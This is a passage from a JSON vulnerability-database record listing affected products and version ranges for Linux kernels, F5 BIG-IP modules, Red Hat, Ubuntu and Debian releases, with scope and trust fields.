      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "openshift container platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.11"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.99"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.64"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.176"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18.136"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.21"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.10"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.156"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "kernel 3.15.6-200.fc20",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel 3.19-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel 3.14-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel 3.10-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel 3.14-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel 3.19-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel 3.15-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
